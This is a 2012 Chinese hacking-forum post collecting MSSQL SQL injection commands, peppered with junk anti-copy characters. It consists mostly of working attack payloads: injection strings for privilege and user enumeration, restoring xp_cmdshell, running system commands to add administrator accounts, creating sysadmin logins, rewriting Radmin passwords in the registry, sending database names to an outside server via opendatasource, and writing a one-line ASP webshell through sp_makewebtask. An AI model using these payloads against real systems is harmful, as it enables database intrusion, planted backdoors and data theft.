找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2169|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令+ C  `7 \- o& z& K9 q
//看看是什么权限的% @6 N. k! z3 n6 g7 P
and 1=(Select IS_MEMBER('db_owner'))
0 P6 A9 L4 p& {/ q1 ]+ B1 dAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
* |+ r  ^9 E/ e0 Q8 D& ^5 c# k  `4 b  S- Y8 w- @3 P( `
//检测是否有读取某数据库的权限( c% a6 }5 A1 P) M4 [( }
and 1= (Select HAS_DBACCESS('master'))# n8 p% z. b9 E
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
& c9 C: x+ p  E* A' U3 E+ g) f0 g+ E/ a: o5 S$ N
/ b9 U; F9 q  |# t. F2 i
数字类型* J' A% E5 C- ]: _7 O: ^3 s! {
and char(124)%2Buser%2Bchar(124)=0; ]% _  G7 b7 q8 k1 M% r
' S) Y5 m" l3 C% V; {. T  j* h
字符类型# t" F* @& u4 I. g- G+ Y+ \& K
' and char(124)%2Buser%2Bchar(124)=0 and ''='
4 H, d" a2 |7 P. S! q) d8 X. z! c) _) J+ R# G9 b, l& h! q& ^
搜索类型
0 b. w6 E& b( J) H! R' and char(124)%2Buser%2Bchar(124)=0 and '%'='
/ L! |  u$ F. _: z, p* h+ l4 [& w: R6 U% \) ^0 f: G8 L
爆用户名# E% c  M5 ]. V1 N$ F/ @
and user>0
1 V0 a' M) z. W/ E3 u8 S' and user>0 and ''='3 {( f2 n0 [  p  ~8 e$ a8 _

6 |, {3 e0 `+ s检测是否为SA权限
5 x' Q) z" v6 h- }, Zand 1=(select IS_SRVROLEMEMBER('sysadmin'));--1 a* z8 s# G. f& D( J. V7 I5 ], o
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
8 o3 a3 L! G8 T7 y" R, s% A# y! y+ R- s
检测是不是MSSQL数据库) u* M' z" G3 u& d9 M
and exists (select * from sysobjects);-- 8 L8 M' z3 Z2 [: h9 p% A" L

" r; U1 U' Y" \5 e检测是否支持多行" V1 {( Z% N4 Y
;declare @d int;-- * M7 [, H1 `& G$ q8 N0 H

( R* b  a$ E0 e" y0 Q% k. y8 S恢复 xp_cmdshell, A1 ?0 Q* h2 q3 ~7 R2 R
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--- ?8 \1 m6 |/ t0 z' E/ q

. l3 r# W( d0 ^  A4 x9 b6 D. P: D$ G4 ^
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
, z2 y0 P  C( }/ V  h
/ Z9 @' Y9 {0 K9 }" h! u4 G//-----------------------1 _1 a7 x2 P. U. g5 v' Y/ w& L
//      执行命令
" C$ e+ ]* Y9 g, N5 U( R//-----------------------
- Q4 Z% H2 m- e1 ^' ?首先开启沙盘模式:
5 k& g. M5 F% [& T5 \1 Y$ e+ B5 Dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1+ |/ J( a# h1 U" W

/ U4 Y( h$ X+ s5 E1 D% t然后利用jet.oledb执行系统命令
! `, {- i" g& w8 L# c( Gselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
( o1 R' c. x$ n- G9 F' ^% |7 [8 I2 A+ n. w
执行命令; @4 J1 b) \6 h- N0 B, [) n, D
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--" w8 v7 f# f; \4 U  D/ X& v
# ^; W. z# ]" T) `
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'& ~- f2 w& S$ ]5 i  V

# T0 G7 J" @& I; w判断xp_cmdshell扩展存储过程是否存在:
. a* W  A2 f) H' |/ A- H% ]http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
) B0 @1 M8 o+ }
( T1 n" r7 R3 N) L3 ?" C写注册表
! G( t- F4 O0 e3 ~9 y% aexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
. n& n) x) j8 c& Z6 y! K( ~7 Y$ D; |3 m# g' l9 p3 [' M
REG_SZ
/ Q0 d/ t+ Z; ^0 a: v4 H
! J* E' u% h! a: t8 M3 m读注册表
% U6 Y% I1 O. \2 D2 l4 o1 aexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'& |; f, i, r: c, [- _

1 [( }6 Z% j$ k9 j- j读取目录内容+ u5 L/ U7 e3 Q: N: d, R; b
exec master..xp_dirtree 'c:\winnt\system32\',1,1
( `2 D2 C( T/ e5 m9 h& u1 T
* N3 C: X# m' n+ ?% p6 N0 V, v4 t( \5 q
数据库备份
& a* K# R4 U( a' t- Fbackup database pubs to disk = 'c:\123.bak'6 ~6 ]% `# N, ]# v5 d
9 o4 Q2 ^2 d" w6 g
//爆出长度
9 W9 c9 `4 x3 Z! `& `And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
/ }# h' ^: J4 M3 x, P4 o2 c
: t$ v: H* H$ v$ [% t. F1 T* [; h6 E! l

4 n+ o2 n+ z1 L! l更改sa口令方法:用sql综合利用工具连接后,执行命令:
9 e4 c) J8 |  U4 d- J1 lexec sp_password NULL,'新密码','sa'
' ]" p% \6 f# s; Y0 }5 V7 h2 A0 s" F$ M7 m8 n, w0 h% S5 M+ V
添加和删除一个SA权限的用户test:
$ m3 k0 s" m6 Q2 C7 Eexec master.dbo.sp_addlogin test,ptlove9 Z; D" ]9 Z. j
exec master.dbo.sp_addsrvrolemember test,sysadmin! |. V5 S7 v4 k% \8 o9 V: e8 e
: r) a# A; Z' x! h& {2 A! ^" O7 F
删除扩展存储过过程xp_cmdshell的语句: ; c1 @: U/ @: s
exec sp_dropextendedproc 'xp_cmdshell'. @1 O% e7 s% r$ ]  b

7 k' [% U& t; z. c( b* Z添加扩展存储过过程
+ |/ X, k- n; w7 YEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' " i; e' q3 e! f9 j) R/ E
GRANT exec On xp_proxiedadata TO public
6 ]+ i& ^. t0 l& f% ]$ Y7 T2 L6 n4 h4 s  p
8 p. m: C/ t, r/ x" ?& M7 E3 A
停掉或激活某个服务。
8 Q8 F+ [# T. p3 w! N: O( M& R/ d( T& F9 r/ q2 g. d# }8 D2 J
exec master..xp_servicecontrol 'stop','schedule'
( ~% [  Q" ?# H  L: q7 eexec master..xp_servicecontrol 'start','schedule'
1 ?1 ~3 p9 L9 t4 o
3 h4 j, r- T0 V0 k  Gdbo.xp_subdirs
$ i. s8 T5 m  K: c5 u8 @3 ^* U
6 N6 Z: A0 W1 P, A: A9 c! m只列某个目录下的子目录。
8 L" C% {3 i  j2 Pxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'! d/ `6 p3 D% Z' q$ M# ?" K
  R- r' l2 \2 v0 D& w
dbo.xp_makecab9 `, j- p) {) J, W, M/ p
' K  X1 g5 F. x1 G4 Z
将目标多个档案压缩到某个目标档案之内。: b+ f  y" E7 k, M0 c1 r  Y6 G4 x
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。9 ?; ]4 K3 _9 ?, D

5 U2 ]+ Z1 Z6 d+ c; s! C. o8 E5 Hdbo.xp_makecab: Q& {( y' R( P- ]6 G: X' |/ A4 I1 o
'c:\test.cab','mszip',1,
" s$ E  L" e" r) o. ~$ f9 q3 j5 @" F! d1 s'C:\Inetpub\wwwroot\SQLInject\login.asp',
6 z+ B# B8 s9 X) h1 L0 @! s'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
) b1 _) N" C7 \( ~7 t/ t
* H$ b3 J$ s% Axp_terminate_process
0 K( O  ~) q0 O7 x. Q0 b1 x
; _3 c, o/ D5 d- J6 N7 ^停掉某个执行中的程序,但赋予的参数是 Process ID。
7 f, v' g. R2 B: ]9 n: Q利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID( A9 }( \: E' f7 ?, X- U* Y- T! \

  _& g5 s. j) o( uxp_terminate_process 2484& R1 i" R4 d1 L' u% m; \# S

( a2 y- A3 c1 D, Nxp_unpackcab
6 Z6 f9 I3 [" M9 _+ p) w1 f5 g. a7 t) N2 r
解开压缩档。  R; y/ S6 X( G2 k

+ [. \9 a" J, z; ]3 v" zxp_unpackcab 'c:\test.cab','c:\temp',1
( i- D) m- o/ t- D# ]6 ?$ C; s) J5 R; U( C9 J! y

, Y0 {& q4 X9 G- g某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
1 |! H' {8 \* k9 U! X1 F' L4 u/ j+ A% l
$ z& b2 j8 c' |5 p2 w5 E. L- K/ z% icreate database lcx;# w/ q3 X3 C; m  ~$ D! N. V2 u
Create TABLE ku(name nvarchar(256) null);
7 E. @) N2 r, M% zCreate TABLE biao(id int NULL,name nvarchar(256) null);+ F' _2 W6 H7 t( m

( c% z; T2 Q% E; \/ J( H//得到数据库名
' ?% Z% \& q7 P. p7 i8 ~insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
0 m+ X( M# E9 u+ h, {% r) _. w  e. b/ N
3 S9 y6 a: M" h  L) M- N1 T  J
//在Master中创建表,看看权限怎样
. Y% M# V; u- {; O. RCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
& K/ n. q: N4 n9 o: v' J! ]# N  Z' Y2 U6 Q5 \( }& L% Y6 A
用 sp_makewebtask直接在web目录里写入一句话马:
8 R. j% v. Y9 Ihttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--( l" [* [; v. L2 {" x. f$ h; b0 g* j
0 F1 _$ k$ V; e" p3 b
//更新表内容& t' N' {$ b7 d6 Y
Update films SET kind = 'Dramatic' Where id = 123
/ C* F. ^- Q1 t0 K9 W$ d- v) m3 T$ u% r8 Y7 y
//删除内容
9 u! j* v3 q, P0 [1 i7 Odelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表